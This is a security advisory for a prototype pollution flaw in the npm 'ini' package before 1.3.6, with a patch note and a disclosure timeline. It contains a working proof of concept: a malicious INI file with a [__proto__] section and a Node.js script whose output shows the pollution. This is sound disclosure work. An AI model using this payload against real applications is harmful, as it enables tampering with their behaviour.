Severity: low

Prototype Pollution

ini

Overview

ini before version 1.3.6 has a Prototype Pollution vulnerability.

Impact

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

Remediation

Upgrade to version 1.3.6 or later.

Have content suggestions? Visit npmjs.com/support.

Advisory timeline

  1. published

    Advisory Published
    Dec 10th, 2020
  2. reported

    Reported by Gur Shafriri on Snyk Security Team
    Dec 9th, 2020